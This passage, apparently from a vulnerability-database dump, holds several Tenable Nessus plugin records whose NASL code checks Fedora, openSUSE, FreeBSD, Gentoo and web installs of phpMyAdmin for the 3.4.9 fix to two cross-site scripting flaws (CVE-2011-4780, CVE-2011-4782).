attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f5963223\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected phpMyAdmin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:phpMyAdmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:16\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/12/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/01/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^16([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 16.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC16\", reference:\"phpMyAdmin-3.4.9-1.fc16\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"phpMyAdmin\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2019-02-21T01:15:49", "bulletinFamily": "scanner", "description": "Changes 3.4.9.0 (2011-12-21) :\n\n - [edit] Inline editing enum fields with null shows no dropdown\n\n - [interface] DB suggestion not correct for user with underscore\n\n - [core] Magic quotes removed in PHP 5.4\n\n - [session] No feedback when result is empty (signon auth_type)\n\n - [display] Problems regarding ShowTooltipAliasTB\n\n - [edit] Can't rename a database that contains views\n\n - [edit] Unable to move tables with triggers\n\n - [navi] Fast filter broken with table tree\n\n - [GUI] Firefox favicon frameset regression\n\n - [core] Better compatibility with mysql extension\n\n - [security] Self-XSS on export options (export server/database/table), see PMASA-2011-20 (http://www.phpmyadmin.net/home_page/security/PMASA-20 11-20.php)\n\n - [security] Self-XSS in setup (host parameter), see PMASA-2011-19 (http://www.phpmyadmin.net/home_page/security/PMASA-20 11-19.php)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-12-24T00:00:00", "id": "FEDORA_2011-17370.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=57424", "published": "2012-01-03T00:00:00", "title": "Fedora 15 : phpMyAdmin-3.4.9-1.fc15 (2011-17370)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2011-17370.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(57424);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2018/12/24 10:14:27\");\n\n script_cve_id(\"CVE-2011-4780\", \"CVE-2011-4782\");\n script_bugtraq_id(51166, 51226);\n script_xref(name:\"FEDORA\", value:\"2011-17370\");\n\n script_name(english:\"Fedora 15 : phpMyAdmin-3.4.9-1.fc15 (2011-17370)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Changes 3.4.9.0 (2011-12-21) :\n\n - [edit] Inline editing enum fields with null shows no\n dropdown\n\n - [interface] DB suggestion not correct for user with\n underscore\n\n - [core] Magic quotes removed in PHP 5.4\n\n - [session] No feedback when result is empty (signon\n auth_type)\n\n - [display] Problems regarding ShowTooltipAliasTB\n\n - [edit] Can't rename a database that contains views\n\n - [edit] Unable to move tables with triggers\n\n - [navi] Fast filter broken with table tree\n\n - [GUI] Firefox favicon frameset regression\n\n - [core] Better compatibility with mysql extension\n\n - [security] Self-XSS on export options (export\n server/database/table), see PMASA-2011-20\n (http://www.phpmyadmin.net/home_page/security/PMASA-20\n 11-20.php)\n\n - [security] Self-XSS in setup (host parameter), see\n PMASA-2011-19\n (http://www.phpmyadmin.net/home_page/security/PMASA-20\n 11-19.php)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # http://www.phpmyadmin.net/home_page/security/PMASA-2011-19.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2011-19/\"\n );\n # http://www.phpmyadmin.net/home_page/security/PMASA-2011-20.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2011-20/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=769981\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=769982\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-January/071523.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c050b567\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected phpMyAdmin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:phpMyAdmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:15\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/12/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/01/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^15([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 15.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC15\", reference:\"phpMyAdmin-3.4.9-1.fc15\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"phpMyAdmin\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2019-02-21T01:21:21", "bulletinFamily": "scanner", "description": "- update to 3.4.9\n\n - bug #3442028 [edit] Inline editing enum fields with null shows no dropdown\n\n - bug #3442004 [interface] DB suggestion not correct for user with underscore\n\n - bug #3438420 [core] Magic quotes removed in PHP 5.4\n\n - bug #3398788 [session] No feedback when result is empty (signon auth_type)\n\n - bug #3384035 [display] Problems regarding ShowTooltipAliasTB\n\n - bug #3306875 [edit] Can't rename a database that contains views\n\n - bug #3452506 [edit] Unable to move tables with triggers\n\n - bug #3449659 [navi] Fast filter broken with table tree\n\n - bug #3448485 [GUI] Firefox favicon frameset regression\n\n - [core] Better compatibility with mysql extension\n\n - [security] Self-XSS on export options (export server/database/table), see PMASA-2011-20\n\n - [security] Self-XSS in setup (host parameter), see PMASA-2011-19\n\n - fix for bnc#738411\n\n - PMASA-2011-19 (CVE-2011-4780)\n\n - PMASA-2011-20 (CVE-2011-4782)\n\n - rework config patch", "modified": "2014-06-13T00:00:00", "id": "OPENSUSE-2012-18.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=74585", "published": "2014-06-13T00:00:00", "title": "openSUSE Security Update : phpMyAdmin (openSUSE-2012-18)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2012-18.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(74585);\n script_version(\"$Revision: 1.1 $\");\n script_cvs_date(\"$Date: 2014/06/13 20:53:55 $\");\n\n script_cve_id(\"CVE-2011-4780\", \"CVE-2011-4782\");\n\n script_name(english:\"openSUSE Security Update : phpMyAdmin (openSUSE-2012-18)\");\n script_summary(english:\"Check for the openSUSE-2012-18 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - update to 3.4.9\n\n - bug #3442028 [edit] Inline editing enum fields with null\n shows no dropdown\n\n - bug #3442004 [interface] DB suggestion not correct for\n user with underscore\n\n - bug #3438420 [core] Magic quotes removed in PHP 5.4\n\n - bug #3398788 [session] No feedback when result is empty\n (signon auth_type)\n\n - bug #3384035 [display] Problems regarding\n ShowTooltipAliasTB\n\n - bug #3306875 [edit] Can't rename a database that\n contains views\n\n - bug #3452506 [edit] Unable to move tables with triggers\n\n - bug #3449659 [navi] Fast filter broken with table tree\n\n - bug #3448485 [GUI] Firefox favicon frameset regression\n\n - [core] Better compatibility with mysql extension\n\n - [security] Self-XSS on export options (export\n server/database/table), see PMASA-2011-20\n\n - [security] Self-XSS in setup (host parameter), see\n PMASA-2011-19\n\n - fix for bnc#738411\n\n - PMASA-2011-19 (CVE-2011-4780)\n\n - PMASA-2011-20 (CVE-2011-4782)\n\n - rework config patch\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=738411\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected phpMyAdmin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:phpMyAdmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/01/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.1\", reference:\"phpMyAdmin-3.4.9-1.19.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"phpMyAdmin\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2019-02-21T01:15:49", "bulletinFamily": "scanner", "description": "The phpMyAdmin development team reports :\n\nUsing crafted url parameters, it was possible to produce XSS on the export panels in the server, database and table sections.\n\nCrafted values entered in the setup interface can produce XSS; also, if the config directory exists and is writeable, the XSS payload can be saved to this directory.", "modified": "2018-12-19T00:00:00", "id": "FREEBSD_PKG_8C83145D2C9511E189B4001EC9578670.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=57390", "published": "2011-12-23T00:00:00", "title": "FreeBSD : phpMyAdmin -- Multiple XSS (8c83145d-2c95-11e1-89b4-001ec9578670)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(57390);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2018/12/19 13:21:18\");\n\n script_cve_id(\"CVE-2011-4780\", \"CVE-2011-4782\");\n\n script_name(english:\"FreeBSD : phpMyAdmin -- Multiple XSS (8c83145d-2c95-11e1-89b4-001ec9578670)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The phpMyAdmin development team reports :\n\nUsing crafted url parameters, it was possible to produce XSS on the\nexport panels in the server, database and table sections.\n\nCrafted values entered in the setup interface can produce XSS; also,\nif the config directory exists and is writeable, the XSS payload can\nbe saved to this directory.\"\n );\n # http://www.phpmyadmin.net/home_page/security/PMASA-2011-19.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2011-19/\"\n );\n # http://www.phpmyadmin.net/home_page/security/PMASA-2011-20.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2011-20/\"\n );\n # https://vuxml.freebsd.org/freebsd/8c83145d-2c95-11e1-89b4-001ec9578670.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?25314e10\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:phpMyAdmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/12/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/12/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/12/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"phpMyAdmin>3.4<3.4.9.r1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2019-02-21T01:15:49", "bulletinFamily": "scanner", "description": "The version of phpMyAdmin hosted on the remote web server is 3.4.x less than 3.4.9 and thus is reportedly affected by two cross-site scripting vulnerabilities :\n\n - The 'libraries/display_export.lib.php' script does not properly sanitize the '$_GET' array elements 'limit_to', 'limit_from' and 'filename_template' before returning it to the client. (CVE-2011-4780)\n\n - The 'libraries/config/ConfigFile.class.php' script does not properly sanitize input in the '$host' parameter before returning it to the client. Note that this issue relates to the '/setup' directory and configuration of the application and should not be exploitable if the recommended installation steps have been performed.\n (CVE-2011-4782)", "modified": "2018-07-24T00:00:00", "id": "PHPMYADMIN_PMASA_2011_20.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=57372", "published": "2011-12-22T00:00:00", "title": "phpMyAdmin 3.4.x < 3.4.9 XSS (PMASA-2011-19 - PMASA-2011-20)", "type": "nessus", "sourceData": "\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(57372);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2018/07/24 18:56:11\");\n\n script_cve_id(\"CVE-2011-4780\", \"CVE-2011-4782\");\n script_bugtraq_id(51166, 51226);\n\n script_name(english:\"phpMyAdmin 3.4.x < 3.4.9 XSS (PMASA-2011-19 - PMASA-2011-20)\");\n script_summary(english:\"Checks version of phpMyAdmin\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server hosts a PHP application that is affected by two\ncross-site scripting vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of phpMyAdmin hosted on the remote web server is 3.4.x\nless than 3.4.9 and thus is reportedly affected by two cross-site\nscripting vulnerabilities :\n\n - The 'libraries/display_export.lib.php' script does not\n properly sanitize the '$_GET' array elements\n 'limit_to', 'limit_from' and 'filename_template'\n before returning it to the client. (CVE-2011-4780)\n\n - The 'libraries/config/ConfigFile.class.php' script does\n not properly sanitize input in the '$host' parameter\n before returning it to the client. Note that this issue\n relates to the '/setup' directory and configuration of\n the application and should not be exploitable if the\n recommended installation steps have been performed.\n (CVE-2011-4782)\");\n\n script_set_attribute(attribute:\"see_also\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2011-19.php\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2011-20.php\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to phpMyAdmin version 3.4.9 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/12/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/12/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/12/22\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:phpmyadmin:phpmyadmin\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses : XSS\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"phpMyAdmin_detect.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_keys(\"www/phpMyAdmin\", \"www/PHP\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nport = get_http_port(default:80, php:TRUE);\n\ninstall = get_install_from_kb(appname:\"phpMyAdmin\", port:port, exit_on_fail:TRUE);\ndir = install['dir'];\ninstall_url = build_url(port:port,qs:dir);\nversion = install['ver'];\n\nif (version == UNKNOWN_VER) exit(1, \"The version of phpMyAdmin at \"+install_url+\" could not be determined.\");\nif (version =~ \"^3(\\.[4])?$\") exit(1, \"The version of phpMyAdmin at \"+install_url+\" (\"+version+\") is not granular enough.\");\n\n# 3.4.x < 3.4.9\nif (version =~ \"^3\\.4\\.[0-8]([^0-9]|$)\")\n{\n set_kb_item(name:'www/'+port+'/XSS', value:TRUE);\n if (report_verbosity > 0)\n {\n report =\n '\\n URL : ' + install_url +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 3.4.9' +\n '\\n';\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n exit(0);\n}\nelse exit(0, \"The phpMyAdmin \"+version+\" install at \"+build_url(port:port,qs:dir)+\" is not affected.\");\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2019-02-21T01:15:49", "bulletinFamily": "scanner", "description": "The remote host is affected by the vulnerability described in GLSA-201201-01 (phpMyAdmin: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in phpMyAdmin. Please review the CVE identifiers and phpMyAdmin Security Advisories referenced below for details.\n Impact :\n\n Remote attackers might be able to insert and execute PHP code, include and execute local PHP files, or perform Cross-Site Scripting (XSS) attacks via various vectors.\n Workaround :\n\n There is no known workaround at this time.", "modified": "2019-02-07T00:00:00", "id": "GENTOO_GLSA-201201-01.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=57433", "published": "2012-01-05T00:00:00", "title": "GLSA-201201-01 : phpMyAdmin: Multiple vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201201-01.\n#\n# The advisory text is Copyright (C) 2001-2019 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(57433);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2019/02/07 9:34:55\");\n\n script_cve_id(\"CVE-2008-7251\", \"CVE-2008-7252\", \"CVE-2010-2958\", \"CVE-2010-3055\", \"CVE-2010-3056\", \"CVE-2010-3263\", \"CVE-2011-0986\", \"CVE-2011-0987\", \"CVE-2011-2505\", \"CVE-2011-2506\", \"CVE-2011-2507\", \"CVE-2011-2508\", \"CVE-2011-2642\", \"CVE-2011-2643\", \"CVE-2011-2718\", \"CVE-2011-2719\", \"CVE-2011-3646\", \"CVE-2011-4064\", \"CVE-2011-4107\", \"CVE-2011-4634\", \"CVE-2011-4780\", \"CVE-2011-4782\");\n script_bugtraq_id(37826, 42584, 42591, 42874, 46359, 48563, 48874, 50175, 50497, 51099, 51166, 51226);\n script_xref(name:\"GLSA\", value:\"201201-01\");\n script_xref(name:\"TRA\", value:\"TRA-2010-02\");\n\n script_name(english:\"GLSA-201201-01 : phpMyAdmin: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201201-01\n(phpMyAdmin: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in phpMyAdmin. Please\n review the CVE identifiers and phpMyAdmin Security Advisories referenced\n below for details.\n \nImpact :\n\n Remote attackers might be able to insert and execute PHP code, include\n and execute local PHP files, or perform Cross-Site Scripting (XSS)\n attacks via various vectors.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n # https://www.phpmyadmin.net/home_page/security/PMASA-2010-1.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2010-1/\"\n );\n # https://www.phpmyadmin.net/home_page/security/PMASA-2010-2.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2010-2/\"\n );\n # https://www.phpmyadmin.net/home_page/security/PMASA-2010-4.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2010-4/\"\n );\n # https://www.phpmyadmin.net/home_page/security/PMASA-2010-5.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2010-5/\"\n );\n # https://www.phpmyadmin.net/home_page/security/PMASA-2010-6.php\n script_set_attribute(\n attribute:\"see_also\",\n 